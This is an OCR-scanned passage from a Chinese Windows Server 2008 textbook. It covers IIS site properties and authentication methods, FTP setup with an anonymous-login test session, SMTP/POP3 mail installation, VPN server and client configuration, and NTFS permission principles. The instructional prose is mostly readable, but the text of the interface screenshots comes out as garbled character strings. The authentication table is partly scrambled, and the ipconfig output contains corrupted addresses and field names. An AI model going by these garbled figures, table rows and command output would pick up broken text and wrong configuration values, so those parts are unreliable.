配置 完 Web 服务 后 ,还 必须 设置 网 站 的 属性 ,提高 网 站 的 安全 性 ,具体 步骤 如 下 。 

(1) 单 击 选中 New web, 显 示 New web 的 属性 页 面 , 如 图 10-25 所 示 。 下 面 介绍 几 个 
主要 的 选项 卡 。 


中 TInternet 信息 服务 (LS) 管 理 器 =|Gjx| 
GS | 图， UncADnsr ， 网 站 Jew web ， | 四 = ||- 
文件 FE) 视图 W) 帮助 00 
New 页 
amialal OO “" "eb EE BB 
本 I 
全 Dosr stexh 分 组 依据 局 8 生生 
地 应 用 程序 也 < = 编 加 站 点 
白 男 网 站 全 TP 响应 标 头 配置 从 Wieb 服务 器 添加 用 应 的 JTTP 标 头 鱼 证 , 
tb Sir 重 定向 指定 将 传 入 的 请 求 重 定向 至 其 他 文件 或 VEL 国 到 
FE 绪 IPv4 地 址 和 域 限制 。 ”基于 IFv4 地 址 或 谍 名 限制 或 摇 巴 访问 eb 查看 应 用 程序 
二 ShPI 第 选 器 指定 修改 ITS 功能 的 ISAFI 第 选 器 理 看 虚拟 目录 
ize 类 型 配置 充 当 痊 态 文件 的 扩展 名 和 关联 的 内 容 类 # Oe 
态 ssr 设置 指定 对 SSL 和 客户 证 书 的 要 求 。 管理 网 站 忆 
羯 | 处 理 程序 映射 指定 处 理 必定 请 求 类 型 gn 应 的 资源 作 重新 启 动 
国 杠 页 配置 出 权时 返回 的 页 b> 启动 
浏 模 块 配置 处 理 Yeb 服务 器 上 的 清 求 的 本 机 和 托 | | 四 信 上 
[回味 认 文档 配置 当 客户 江 示 在 请 求 中 指定 文件 时 返回 = -一 一 
辣 目 录 济 上 配置 要 在 目录 列表 中 显示 的 信息 浏览 网 站 
目 昌 志 配置 ITS 在 heb 服务 器 上 记录 请 求 的 方式 国 测 #60 Qttp) 
成 身份 验证 配置 网 站 和 应 用 程序 的 身份 失 证 设置 襄 加 设置 
辆 失败 请 求 中 路 规则 。。 本 置 失败 的 请 求 跟 中 的 日 志 记 录 这 
[区 授权 规则 配置 授权 用 户 访问 网 站 和 应 用 程序 的 规则 
[5 铺 册 组 丰 指定 在 输出 缓存 中 手 存 所 提供 的 内 容 的 规则 关中 请 求 趴 踪 “ 
局 E 纺 配置 设置 以 压 编 响应 限制 … 
lm sw 
联机 帮助 
4 下 四 图 ] 内 容 视 图 


图 10-25 New web 属性 界面 


。“ 目 录 浏 览 ?选项 卡 : 没有 特殊 要 求 ,一 般 保 存 默认 配置 。 
。“ 默 认 文档 ?选项 卡 : 如 图 10-26 所 示 ,可 以 看 到 几 个 默认 的 主页 文件 Default. html、 
Default. asp ,index. htm \iisstart. asp, 可 以 修改 其 中 的 任意 一 个 文档 来 建立 自己 的 
网 站 ,也 可 以 在 图 10-26 界面 上 单 击 “添加 ”按钮 进行 添加 。 
。“ 身 份 验 证 ”选项 卡 : 在 该 选项 卡 的 “身份 验证 和 访问 控制 机 制 " 有 6 种 身份 验证 方 
法 ,通过 表 10-3 来 简单 说 明 一 下 ,用 户 可 以 根据 需要 选择 一 项 适合 自己 所 要 部 署 的 
Web 环境 。 
(2) 在 图 10-26 界面 中 选择 “网 站 ”选项 卡 , 单 击 “ 高 级 ”, 单 击 “ 编 辑 ”, 在 弹出 的 对 话 框 
中 设置 主机 头 。 至 于 其 他 选项 卡 ,这 里 不 再 做 详细 介绍 。 
6. Web 服务 配置 的 验证 
首先 在 Web 服务 的 文档 目录 下 保存 一 个 网 页 ,在 客户 端的 浏览 器 地 址 栏 中 输入 
http://IP 地 址 或 http:// 域 名 ( 即 主 机 头 ) ,如果 能 出 现 保存 过 的 网 页 , 即 Web 服务 配置 成 
功 。 如 果 不 能 出 现 保 存 过 的 网 页 , 则 需要 检查 目录 的 安全 性 与 文档 的 权限 。 
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net 信息 服务 CIS) 管 理 器 -入 =I9lxl 
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文件 于 】 视图 WW 帮助 00 
多 - 回 | 这 | 全 @ 身份 验证 加 二 
时 下 从 wzsrpuul| | | 分组 依据 :不 进行 人 组 下 ee 
好 应 用 程序 了 到 
昌国 网 站 ASP.IET 模 执 已 大 用 
人 Web Si Forns 身份 验证 已 禁用 J0TP 302 登录 / 重 : 
[EE Windows 身份 验证 已 禁用 I0TP 401 质询 
BO Hen web 基本 身份 验证 已 禁用 I0TP 401 质询 
匿名 身份 输 证 已 启用 
搞 要 式 身 份 验证 已 大 用 IOTP 401 质 词 
| 
1 司 国花 视 昌 ] 忆 内 容 视 图 
图 10-26 文档 选项 卡 界面 
表 10-3 网 站 身份 验证 方法 
身份 验证 方式 ”| 安全 级 别 如 何 发 送 密 码 能 否 跨越 防火 墙 客户 端 要 求 
匿名 身份 验证 无 不 发 送 是 任何 浏览 器 
基本 身份 验证 低 以 Base64 编码 的 明文 | 是 大 多 数 浏览 器 
摘要 式 身份 验证 中 Hash 计算 是 IE5 以 上 
对 应 用 程序 的 登录 页 和 其 
F 名 ， 1 
orms 身份 验证 中 纯 文 本 形式 是 ,使 用 SSL 连接 他 所 有 页 使 用 SSL 加 密 
Hash 计算 时 使 用 IE2. 0 
Windows 身份 验证 高 wp 计 委 和 否 以 上 ,用 Kerberos 使 用 
Kerberos 
IE5 以 上 
ASP. NET 模拟 高 加 密 是 ,使 用 SSL 连接 | IE 或 Netscape 


10.3.4 FTP 服务 的 配置 与 应 用 


1. FTP 原理 的 介绍 

在 FTP 会 话 中 ,存在 两 个 独立 的 TCP 连接 ,一 个 被 称 做 控制 连接 , 另 一 个 被 称 为 数据 
连接 。 

控制 连接 主要 用 来 传送 在 实际 通信 过 程 中 需要 执行 的 FTP 命令 及 命令 的 响应 。 控 制 
连接 是 在 执行 FTP 命令 时 ,由 客户 端 发 起 的 通 往 服务 器 端的 连接 。 控 制 连接 并 不 传输 数 
据 ,只 响应 命令 ,需要 很 小 的 带宽 。 

数据 连接 用 来 传输 用 户 的 数据 。 在 客户 端 要 求 进行 目录 列表 、 上 传 和 下 载 等 操作 时 , 客 
户 端 和 服务 器 端 建立 一 条 数据 连接 。 这 里 的 数据 连接 是 全 双 工 的 ,允许 同时 进行 双向 数据 
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传输 , 即 客户 端 和 服务 器 端 都 有 可 能 是 数据 的 发 送 者 。 在 数据 连接 存在 的 时 间 内 ,控制 连接 
肯定 是 存在 的 。 一 旦 控制 连接 断 开 ,数据 连接 会 自动 关闭 。 

2. FTP 服务 的 安装 

通过 “程序 和 功能 ”安装 FTP 服务 。 

详细 步骤 如 下 。 

(1) 选择 “开始 ”>“ 管 理工 具 ”>“ 服 务 器 管理 器 ”, 打 开 “ 服 务 器 管理 器 ”窗口 。 

(2) 单 击 “ 角 色 ”, 打 开 “ 角 色 ” 窗 口 。 单 击 “ 添 加 角色 服务 ”, 并 打开 “选择 服务 角色 ” 
向 导 。 

(3) 选中 “FTP 发 布 服务 ”, 单 击 “ 下 一 步 ” 按 钮 进入 “确认 安装 ”界面 , 单 击 “ 安 装 ” 按 钮 。 
之 后 在 “安装 成 功 ” 界 面 单 击 关 闭 ” 按 钮 即 可 完成 安装 。 

3. FTP 服务 的 验证 

验证 FTP 服务 是 否 安装 成 功 有 以 下 两 种 方法 。 

1) 查看 文件 

如 果 FTP 安装 成 功 ,将 在 %systemdrive%\ 中 自动 创建 一 个 名 为 Inetpub 的 文件 夹 ,其 
中 包含 ftproot 子 文件 夹 。 

2) 查看 服务 

FTP 服务 安装 成 功 后 ,会 自动 启动 。 因 此 ,在 服务 列表 中 将 能 够 查看 到 已 启动 的 FTP 
服务 。 选 择 “ 开 始 ” 一 “管理 工具 ”一 “服务 ”, 打 开 “ 服 务 " 窗 口 ( 或 者 右键 单 击 “ 计 算 机 ”一 “ 
理 ”, 进 入 “服务 器 管理 器 ”, 展 开 “ 配 置 ”, 在 列表 中 选择 “服务 "命令 ) ,在 此 能 够 查看 已 启动 的 
FTP 服务 。 

4. FTP 服务 的 配置 

上 述 工作 无 误 后 ,说 明 FTP 安装 成 功 , 接 下 来 可 以 进行 FTP 服务 的 配置 了 。 详 细 配 置 
步骤 如 下 。 

(1) 选择 “开始 ”一 “管理 工具 ”一 服务 器 管理 器 ” ,打开 “服务 器 管理 器 ”窗口 ,选择 “ 角 
色 ”>“Web 服务 器 (IIS) ”一 Internet 信息 服务 (11S) 管 理 器 "(也 可 以 选择 “开始 ”>“ 运 行 ”， 
输入 “inetmgr”, 按 Enter 键 ) ,展开 “Internet 信息 服务 (IIS) 管 理 器 ”。 

(2) 选中 “FTP 站 点 ”并 单 击 右 侧 窗口 中 的 “ 单 击 此 处 启动 ”, 即 进入 “Internet 信息 服务 
(IIS) 管 理 器 ”。 

(3) 右键 选中 *FTP 站 上 点”, 选择“ 新 建 ”>“FTP 站 点 ”, 进 入 欢迎 界面 , 单 击 “ 下 一 步 ” 按 
钮 ,进入 "FTP 站 点 描述 "界面 ,在 “描述 ”文本 框 中 输入 FTP 站 点 的 相关 描述 (可 以 为 空 )， 
这 里 输入 "FTP1”。 

(4) 单 击 “下 一 步 " 按 钮 .进入 “IP 地 址 和 端口 设置 ?界面 。 在 此 界面 可 以 设置 FTP 站 点 
所 使 用 的 IP 地 址 (192. 168. 1. 1) 和 端口 号 (21) 。 

(5) 单 击 * 下 一 步 ? 按 钮 ,进入 FTP 用户 隔 离 ” 界 面 , 可 以 设置 FTP 用 户 隔离 的 选项 ,在 
此 界面 上 有 三 种 选择 。 

下 面 简要 说 明 这 三 种 隔离 模式 的 特点 。 

。 不 隔离 用 户 : 该 模式 适合 于 只 提供 共享 内 容 下 载 功能 的 站 点 或 不 需要 在 用 户 间 进 

行 数据 访问 保护 的 站 点 。 
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。 隔离 用 户 : 该 模式 下 用 户 被 指定 和 限制 在 自己 的 主 目录 里 ,不 允许 用 户 浏 览 主 目录 
外 的 内 容 。 
。 Active Directory 隔离 用 户 : 该 模式 根据 相应 的 Active Directory 容器 验证 用 户 , 不 
需要 花费 大 量 的 时 间 去 搜索 整个 Active Directory, 该 用 户 被 放 在 代表 FTP 根 位 置 
的 用 户主 目录 中 ,只 能 看 见 自己 的 FTP 根 位 置 ,不 能 向 上 浏览 目录 树 。 
(6) 单 击 “下 一 步 ?按钮 ,进入 "FTP 站 点 主 目录 ”界面 ,在 此 可 以 设置 FTP 站 点 的 主 
目录 。 
(7) 单 击 “下 一 步 "按钮 ,进入 "FTP 站 点 访问 权限 界面, 如果 只 人 允许 用 户 下载 , 则 只 选 
中 “* 读 取 ” 复 选 框 。 如 果 既 允许 用 户 下 载 又 允许 用 户 上 传 , 则 同时 选中 “ 读 取 ”和 “ 写 入 ” 复 
选 框 。 
(8) 单 击 * 下 一 步 ? 按 钮 ,进入 完成 界面 , 单 击 * 完 成 ”按钮 ,返回 “Internet 信息 服务 (IIS) 
管理 器 ”控制 台 ,FTP 站 点 新 建 完成 。 
(9) 重新 启动 FTP 服务 ,使 最 新 配置 生效 。 
5. FTP 服务 配置 的 验证 
客户 端 测 试 时 通常 基于 命令 行进 行 测试 ,测试 结果 如 下 : 


C:\Documents and Settings\Administrator > ftp 192.168.1.1 
Connected to 192.168.1.1. 

220 Microsoft FTP Service 

User (192.168.1.1:(none)): ftp 

331 Anonymous access allowed, send identity (e 一 mail name) as P 
Password: 

230 Anonymous user logged in. 

ftp> ls (显示 当前 目录 下 的 内 容 ) 

200 PORT command successful. 

150 Opening ASCII mode data connection for file list. 
MEDIA 

OFFICE11 

Templates 

226 Transfer complete. 

ftp: 收 到 28 字 节 ,用 时 0. 00Seconds 28000. 00Kbytes/sec. 
ftp> cd MEDIA (切换 目录 ,进入 目录 MEDIA) 

250 CWD command successful. 

ftp> pwd (显示 当前 目录 ) 

257 "/MEDIA" is current directory. 


由 于 篇 幅 的 原因 ,还 有 get( 下 载 命令 ) 和 put( 上 传 命令 ) ,这 里 不 再 介绍 。 
10.3.5 MAIL 服务 的 配置 与 应 用 


1. MAIL 服务 简介 

电子 邮件 系统 由 两 个 重要 的 服务 器 组 成 , 即 SMTP (用 来 发 送 电 子 邮 件 ) 服 务 器 和 
POP3( 用 来 接收 电子 邮件 ) 服 务 器 。 平 时 人 们 在 发 送 电 子 邮件 时 ,只 是 把 邮件 发 送 到 邮件 服 
务 器 上 ,而 服务 器 首先 将 邮件 存储 起 来 .把 收 到 的 电子 邮件 进行 排队 ,再 将 队列 中 的 邮件 发 
送 到 服务 器 上 。 配 置 邮件 服务 器 主要 对 上 述 这 两 个 服务 器 进行 配置 。 
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Windows Server 2008 的 邮件 服务 器 配置 非常 简单 ,只 需 几 个 步骤 就 可 以 完成 ,与 专业 
的 邮件 服务 器 相 比 ,只 能 算 一 个 具备 收发 功能 的 简单 服务 器 ,还 有 很 多 功能 没有 实现 ,比如 
容量 控制 .邮件 转发 等 ,下 面 借助 Windows Server 2008 系统 的 服务 组 件 来 创建 一 个 简单 的 
邮件 服务 器 。 

2. MAIL 服务 的 安装 

有 以 下 两 种 安装 方法 。 

1) 通过 “程序 和 功能 ”安装 邮件 服务 

详细 步 又 如 下 。 

(1) 选择 “开始 ”>“ 控 制 面板 ”>“ 程 序 和 功能 ”, 打 开 “ 程 序 和 功能 ”窗口 。 

(2) 单 击 “打开 或 关闭 Windows 功能 ”, 并 打开 “服务 器 管理 器 "窗口 。 

(3) 选中 “功能 " 单 击 “添加 功能 ”, 进 入 “选择 功能 "界面 。 

(4) 选中 “SMTP 服务 器 ”, 单 击 “ 下 一 步 ?按钮 ,将 开始 安装 电子 邮件 服务 器 。 

(5) 在 步骤 (2) 后 选择 “应 用 程序 服务 器 ”。 

(6) 单 击 “详细 信息 ”按钮 ,选中 * Internet 信息 服务 ”。 

(7) 单 击 * 详 细 信息 ”按钮 ,选中 SMTP Service 复 选 框 。 

(8) 返回 “Windows 组 件 ? 界 面 , 单 击 * 下 一 步 ? 按 钮 ,进入 完成 界面 , 单 击 * 完 成 ”按钮 。 

2) 通过 “服务 器 管理 器 ”来 安装 邮件 服务 

详细 步骤 如 下 。 

(1) 单 击 “开始 ”一 “管理 工具 ”一 “服务 器 管理 器 ”, 弹 出 “服务 器 管理 器 ”窗口 。 

(2) 选择 “功能 ”并 单 击 “ 添 加 功能 ”, 进 入 “选择 功能 "界面 ,选择 “SMTP 服务 器 ” 单 击 
“下 一 步 ” 按 钮 ,进行 电子 邮件 服务 器 安装 ,如 图 10-27 所 示 。 


添加 功能 向 导 划 
描述 
司 加 
到 
Ent] Am | mw | 


图 10-27 服务 器 角色 选择 
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(3) 单 击 “下 一 步 ? 按 钮 ,系统 自动 弹出 “配置 POP3 服务 ”的 窗口 ,在 此 界面 上 包括 身份 
验证 和 电子 邮件 域名 两 部 分 ,身份 验证 包括 本 地 账户 身份 验证 和 加 密 密 码 文件 两 种 方式 。 
选择 身份 验证 方式 ,输入 电子 域名 。 电 子 域名 在 DNS 里 创建 ,并 设置 为 邮件 交换 。 

(4) 单 击 “ 下 一 步 ? 按 钮 ,显示 “选择 总 结 ?界面 。 

(5) 单 击 “确认 ”按钮 , 单 击 * 下 一 步 ?按钮 ,系统 将 自动 完成 安装 。 安 装 完成 后 ,系统 提 
示 此 服务 器 已 经 是 邮件 服务 器 , 单 击 “完成 "按钮 ,至 此 邮件 服务 器 安装 完成 。 

3. MAIL 服务 的 验证 

验证 MAIL 服务 是 否 安装 成 功 有 以 下 两 种 方法 。 

1) 查看 文件 

如 果 MAIL 服务 安装 成 功 ,将 在 中 systemdrive%\ 中 自动 创建 一 个 名 为 Inetpub 的 文件 
夹 , 其 中 包含 mailroot 子 文件 夹 。 

2) 查看 服务 

MAIL 服务 安装 成 功 后 ,会 自动 启动 。 因 此 ,在 服务 列表 中 能 够 查看 到 已 经 启动 的 服 
务 。 选 择 “ 开 始 ”>“ 管 理工 具 ” 一 “服务 ”, 打 开 “ 服 务 ” 窗 口 ( 或 者 右键 单 击 “ 计 算 机 ”一 “管理 ”， 
进入 “服务 器 管理 器 ”, 展 开 “ 配 置 ”, 在 列表 中 选择 “服务 "命令 ), 在 此 能 够 查看 到 已 启动 的 
SMTP 服务 。 


10.4 Windows Server 2008 操作 系统 的 安全 设置 


10.4.1 VPN 的 安全 性 配置 


1. VPN 简介 

VPN(Virtual Private Network ,虚拟 专用 网 ) 是 穿越 专用 网 络 或 公用 网 络 的 、 安 全 的 、 
点 对 点 连接 的 网 络 。VPN 客户 端 使 用 特定 的 隧道 协议 ,与 VPN 服务 器 建立 虚拟 连接 。 
VPN 客户 端 使 用 VPN 连接 到 与 Internet 相连 的 VPN 服务 器 上 。VPN 服务 器 通过 应 答 验 
证 VPN 客户 端 身份 ,并 在 VPN 客户 端 和 内 部 网 络 之 间 传 送 数据 。 下 面 来 介绍 一 下 VPN 
组 件 的 构成 和 工作 过 程 。 

(1) 远程 访问 VPN 组 件 的 构成 。 

VPN 主要 由 下 面 4 部 分 构成 。 

@ VPN 服务 器 。VPN 服务 器 用 于 接收 并 响应 VPN 客户 端的 连接 请 求 , 并 建立 VPN 
连接 。 它 可 以 是 专用 的 VPN 服务 器 设备 ,也 可 以 是 运行 VPN 服务 的 主机 。 

@ VPN 客户 端 。VPN 客户 端 用 于 向 服务 器 发 起 连接 VPN 请 求 ,通常 为 VPN 连接 组 
件 主机 。 

@ 隧道 协议 。VPN 的 实现 依赖 于 隧道 协议 ,通过 隧道 协议 ,可 以 将 一 种 协议 用 另 一 种 
协议 或 相同 协议 封装 ,同时 还 可 以 提供 加 密 、 认 证 服务 。 目 前 常用 的 隧道 协议 有 PPTP、 
L2TP 和 IPSec。 

@ Internet 连接 。VPN 服务 器 和 客户 端 必须 都 接 入 Internet, 并 且 通 过 Internet 能 够 
通信 。 
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(2) 访问 VPN 服务 器 的 连接 过 程 分 为 下 面 5 个 步骤 。 

g@ 客户 端 通过 Internet 向 服务 器 连接 接口 发 送 VPN 连接 请 求 。 

@ 服务 器 接收 到 客户 端 建立 连接 请 求 后 ,对 客户 端 进 行 验证 。 

@ 如 果 验 证 未 通过 , 则 拒绝 客户 端的 请 求 。 

@ 如 果 身 份 验证 通过 , 则 允许 客户 端 连接 ,并 分 配 一 个 内 网 的 IP 地 址 。 

@ 客户 端 将 获得 的 IP 地 址 与 VPN 连接 组 件 进行 绑 定 ,并 与 内 网 进行 通信 。 

2. VPN 服务 器 端 配置 

了 解 了 VPN 的 概念 与 工作 原理 后 , 接 下 来 进行 VPN 的 配置 ,详细 步骤 如 下 。 

(1) 选择 “开始 ”一 “管理 工具 ”一 “路 由 和 远程 访问 ”, 打 开 “ 路 由 和 远程 访问 ”管理 控 
制 台 。 

(2) 在 左 侧 的 控制 台 树 中 右键 单 击 计算 机 名 ,在 弹出 的 快捷 菜单 中 选择 “配置 并 启用 路 
由 远程 访问 ”命令 ,打开 “路 由 和 远程 访问 服务 器 安装 向 导 ” 对 话 框 。 

(3) 单 击 * 下 一 步 ”按钮 ,进入 “配置 "界面 。 

(4) 选择 “远程 访问 (拨号 或 VPN)" 复 选 框 ,然后 单 击 “ 下 一 步 ”按钮 ,进入 “远程 访问 ” 
界面 ,在 此 界面 中 可 以 选择 远程 访问 服务 器 的 类 型 (拨号 、VPN 或 两 者 ) 。 

(5) 单 击 “ 下 一 步 ” 按 钮 ,进入 “IP 地 址 指定 ”界面 ,在 此 界面 中 选择 为 远程 访问 服务 的 客 
户 端 分 配 IP 地 址 的 方式 。 

(6) 选中 “来 自 一 个 指定 的 地 址 范围 " 复 选 框 ,然后 单 击 “ 下 一 步 ” 按 钮 ,进入 “地 址 范围 
分 配 ” 界 面 ,在 此 界面 中 指定 IP 地 址 范围 。 

(7) 单 击 “ 新 建 " 按 钮 ,打开 “新 建 地 址 范围 ”对 话 框 ,在 此 对 话 框 中 输入 IP 地 址 。 

(8) 单 击 “ 确 定 ” 按 钮 ,返回 地址 范围 分 配 ” 界 面 ,可 以 查看 添加 的 IP 地 址 范围 ， 
如 图 10-28 所 示 。 


轩 阁 由 和 远程 访问 服务 器 安装 向 导 


地 址 范围 分 配 
您 可 以 指定 此 服务 器 用 来 对 运程 客户 山 分 配 地 址 的 地 址 范围 。 


围 晨 态 也 )。 在 用 到 下 一 个 之 前 ， 此 服务 器 持 用 第 一 


到 数目 | 
192.168.1.1 192 168.1.30 30 
新 站) | 编辑 FE) 【L 过 | 


< 上 -- 步 中 取消 


图 10-28 添加 结果 界面 


(9) 单 击 “ 下 一 步 ” 按 钮 ,在 此 界面 中 选择 是 否 使 用 指定 RADIUS 服务 器 。 
(10) 单 击 * 下 一 步 ?按钮 ,进入 完成 界面 , 单 击 * 完 成 ”按钮 ,在 弹出 的 界面 中 单 击 * 确 定 ” 
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按钮 ,安装 完成 。 

(11) 设置 账号 的 拨 入 属性 ,这 里 不 再 介绍 。 

3. VPN 客户 端 配 置 

在 客户 端 需要 创建 一 个 新 的 网 络 连接 ,详细 步骤 如 下 。 

(1) 选择 “开始 ”一 “控制 面板 ”网 络 和 共享 中 心 ? 对 话 框 。 选 择 “ 设 置 连 接 或 网 络 ”， 
弹出 “选择 一 个 连接 选项 ”界面 ,选择 “连接 到 工作 区 ”, 单 击 “ 下 一 步 ” 按 钮 进入 “连接 到 工作 
区 ”界面 。 

(2) 单 击 “ 使 用 我 的 Internet 连接 (VPN)” 进 入 “连接 之 前 ”界面 。 在 此 选择 连接 到 
Internet 的 方式 (默认 选择 “宽带 连接 ”), 单 击 “ 下 一 步 ” 按 钮 ,进入 “键入 要 连接 的 Internet 
地 址 ”界面 ,输入 Internet 地 址 (connection. contoso. com) 和 目标 名 称 (Connection. vpn) 并 
选择 “现在 不 连接 ; 仅 进 行 设置 以 便 稍 后 使 用 此 连接 " 复 选 框 。 

(3) 单 击 “ 下 一 步 ” 按 钮 ,进入 “键入 您 的 用 户 名 和 密码 ”窗口 ,输入 用 户 名 (administrator) 
及 密码 。( 此 时 的 用 户 名 就 是 前 面 章节 中 管理 员 的 名 字 ,实际 生 产 环境 中 请 尽量 不 要 使 用 。) 

(4) 单 击 “ 创 建 " 按 钮 , 稍 后 会 进入 “连接 已 可 以 使 用 ”界面 , 单 击 “ 关 闭 ” 按 钮 。 

(5) 单 击 * 下 一 步 ” 按 钮 ,进入 *VPN 服务 器 选择 界面 ,在 此 输入 VPN 服务 器 的 服务 器 
名 或 者 是 IP 地 址 (192. 168. 1. 1)。 


(6) 单 击 * 下 一 步 " 按 乌 ,进入 完成 界面 , 单 击 "完成 "按钮, 弹 | “2 
出 “连接 "对 话 框 ,输入 用 户 名 和 密码 进行 连接 。 连 接 成 功 后 ,如 | 蕊 | SEE 
图 10-29 所 示 。 
(7) 使 用 ipconfig/all 查看 连接 ,结果 如 下 。 图 10-29 连接 成 功 界面 


PPP adapter 虚拟 专用 网 络 连 接 : 


Connection-specific DNS Suffix .: 


Description . . . . . . . . . . . :WAN (PPP/SLIP) Interface 
Physical Address. . . . . . . . . : 00-53-45-00-00-00 

Dhep Eoobled Huss ss No 

IP Mee 4 192,160:15 

Suboet Wook . ,so srr 0 5 255.255.255.255 
Default Gateway ......... : 192.168.1.5 

DNS Servers ........... :192.168.1.1 


10.4.2 使 用 NTFS 实现 文件 安全 


1. NTFS 权限 的 基本 概念 

NTFS 权限 ,顾名思义 只 有 在 NTFS 分 区 上 的 文件 和 文件 夹 才 可 以 设置 NTFS 权限 ， 
FAT 和 FAT32 分 区 上 的 文件 和 文件 夹 没 办 法 设置 NTFS 这 种 访问 权限 , NTFS 权限 用 来 
控制 用 户 对 该 文件 或 文件 夹 的 访问 权 。 下 面 对 NTFS 文件 夹 权限 进行 简要 说 明 。 

(1) 读 取 : 允许 用 户 查 看 该 文件 夹 内 的 所 有 子 文件 夹 和 子 文件 ,包括 它们 的 属性 、 所 有 
权 和 权限 等 。 

(2) 写 入 : 允许 用 户 在 该 文件 夹 内 添加 子 文件 或 文件 夹 , 更 改 文件 夹 的 属性 ,权限 和 所 
有 权 等 。 
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(3) 列 出 文件 夹 目 录 : 在 读 取 权限 的 基础 上 增加 了 浏览 文件 夹 的 权限 ,以 便 访问 子 文 
件 烽 。 

(4) 读 取 和 运行 : 和 列 出 文件 夹 目录 基本 相同 ,不 同 的 是 列 出 文件 夹 目录 只 能 被 子 文 
件 夹 继承 ,而 “ 读 取 和 运行 ” 既 可 以 被 文件 夹 继承 又 可 以 被 文件 继承 。 

(5) 修改 : 允许 用 户 删 除 子 文件 或 文件 夹 。 

(6) 完全 控制 : 获得 上 述 所 有 权限 . 即 具备 了 所 有 NTFS 权限 。 

2. NTFS 权限 的 设置 

对 于 一 个 NTFS 分 区 上 的 文件 夹 或 者 文件 ,用 右键 单 击 该 文件 ,在 弹出 的 菜单 中 选择 
“属性 ”命令 ,在 随后 出 现 的 “属性 ”对 话 框 中 ,选择 “安全 ”选项 卡 ,就 可 以 在 此 界面 上 进行 
NTFS 权限 设置 ,如 图 10-30 所 示 。 

下 面 从 两 方面 介绍 如 何 设置 NTFS 权限 。 

1) 添加 /删除 用 户 和 组 

在 图 10-30 中 , 单 击 “ 编 辑 ”, 打 开 相 应 权限 对 话 框 , 单 击 “ 添 加 ”按钮 ,在 出 现 的 对 话 框 中 
输入 用 户 和 账户 名 称 , 再 单 击 “ 检 查 名 称 ” 按 钮 对 该 名 称 进行 核实 ,如 果 核 实 通 过 , 单 击 “ 确 
定 ” 按 钮 ,添加 账号 成 功 。 

如 果 希 望 以 选取 的 方式 添加 用 户 和 组 账号 名 称 , 在 如 图 10-31 所 示 对 话 框 中 单 击 “ 添 
加 ”按钮 ,在 弹出 的 对 话 框 中 可 单 击 “ 高 级 ”按钮 ,在 出 现 的 对 话 框 中 单 击 “ 对 象 类 型 "按钮 
来 缩小 账户 类 型 的 范围 , 单 击 * 位 置 ?按钮 来 指定 搜索 账号 的 位 置 ,然后 单 击 “ 立 即 查找 ” 
按钮 。 

到 


带 规 | 共享 安全 | 以 版 本 | 自 定义 | rr RR xd 
对 象 多， Cc: Ww 


Adninistrators (TESTEXANPLE\Adninistrators) 


中 Users OESTEXNNPLE\Users) 人 
总 Adninistrators (TESTEXANPLE\Adninistrators) 


要 更 疏 权限 ， 请 单 击 “ 编 辑 ”。 [CD Rouest 0ESTEKNIPLE\Goest) 
妃 Users (ESTEXANPLE\Vsers) 
CREATOR OWNER 的 权限 下) 允许 拒绝 : 
完全 控制 2 
修 必 
读 取 和 执行 
列 册 文件 来 目录 
读 取 
到 


确定 取消 [ia[A 


图 10-30 NTFS 权限 设置 界面 1 图 10-31 NTFS 权限 设置 界面 2 


在 “搜索 结果 ”窗口 中 以 鼠标 选取 账户 时 .可 以 按 住 Shift 键 连续 选取 或 者 按 住 Ctrl 键 
间隔 选取 多 个 用 户 ,最 后 单 击 “确定 ”按钮 ,在 返回 的 对 话 框 中 再 次 单 击 “ 确 定 ” 按 钮 ,完成 账 
户 添 加 操作 。 接 下 来 再 来 看 “属性 ”对 话 框 的 “安全 ”选项 卡 的 界面 ,如 图 10-31 所 示 , 发 现 多 
出 了 刚 添加 的 用 户 账号 或 者 组 。 
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2) 为 用 户 和 组 设置 权限 
在 图 10-31 的 界面 上 选中 刚 添加 的 用 户 或 者 组 ,在 下 面 的 对 话 框 中 选择 相应 的 NTFS 
权限 。 在 这 个 对 话 框 中 看 到 的 都 是 NTFS 标准 权限 ,每 一 种 权限 都 可 以 设置 为 “允许 ”或 者 
“拒绝 ”两 种 访问 ,这 种 不 可 编辑 的 选项 继承 自 该 用 户 或 组 对 该 文件 或 文件 夹 所 在 上 一 级 文 
件 夹 的 NTFS 权限 ,如果 需要 进一步 设置 NTFS 权限 ,可 以 在 图 10-30 的 界面 上 单 击 “ 高 级 ” 

按钮 ,在 弹出 的 对 话 框 中 单 击 “ 编 辑 ” 进 行 设置 ,如 图 10-32 所 示 。 
到 


mR | 
要 查看 或 纺 提 权限 项 目的 洋 妇 信息 ， 请 选择 这 项 目 并 单 击 “ 坊 担 ”。 


对 象 名 称 : 5:VEB 


完全 控制 ce\ 
允许 Adninistrators (TE..， 完全 控制 CN 
允许 Vsers (TESTEXANPLE, 读 取 和 执行 CN 该 文件 夹 ， 子 文件 来 
名 许 Vsers (TESTEXANPLE, 特殊 ci\ 该 文件 夹 及 子 文件 夹 
允许 CREATOR OWNER 特殊 CS 只 有 子 文件 夹 及 文件 
厅 包括 可 从 该 对 象 的 父 项 继承 的 权限 民 ) 
到 六 风 中 从 | 生 条 四 壬 当中 ER 


my | am | 


图 10-32 权限 高 级 安全 设置 界面 


3. 设置 NTFS 权限 的 基本 原则 
设置 NTFS 权限 的 基本 原则 包括 以 下 三 点 。 
(1) 权限 最 大 化 。 用 户 对 于 某 个 对 象 的 NTFS 权限 追求 最 大 化 原则 ,所 有 可 获得 权限 
的 总 和 是 其 最 后 权限 。 
(2) 拒绝 权 最 大 化 。 在 NTFS 权限 设置 中 ,一 个 用 户 对 某 个 对 象 的 权限 是 其 所 有 权限 
的 综合 ,但 是 如 果 存在 拒绝 权限 , 则 拒绝 权限 将 覆盖 其 他 相应 的 权限 。 
(3) 继承 原则 。 在 一 个 文件 夹 或 文件 未 被 进行 NTFS 权限 设置 时 ,其 默认 NTFS 权限 
由 其 所 在 的 文件 夹 继 承 而 来 。 在 如 图 10-32 所 示 的 界面 上 有 两 个 复 选 框 用 于 对 继承 关系 的 
操作 。 
。“ 包 括 可 从 该 对 象 的 父 项 继承 的 权限 (D” 复 选 框 : 允许 父 项 的 继承 权限 传播 到 该 对 
象 和 所 有 子 对 象 ,包括 那些 在 此 明确 定义 的 项 目 。 选 中 此 复 选 框 , 则 上 一 级 文件 夹 
的 NTFS 权限 将 被 该 对 象 继 承 ,并 传递 到 下 一 级 对 象 ; 取消 此 复 选 框 , 则 打破 了 与 
上 一 级 文件 夹 的 NTFS 权限 的 继承 关系 。 
。“ 使 用 可 从 此 对 象 继承 的 权限 替换 所 有 后 代 上 现 有 的 所 有 可 继承 权限 (P)" 复 选 框 : 
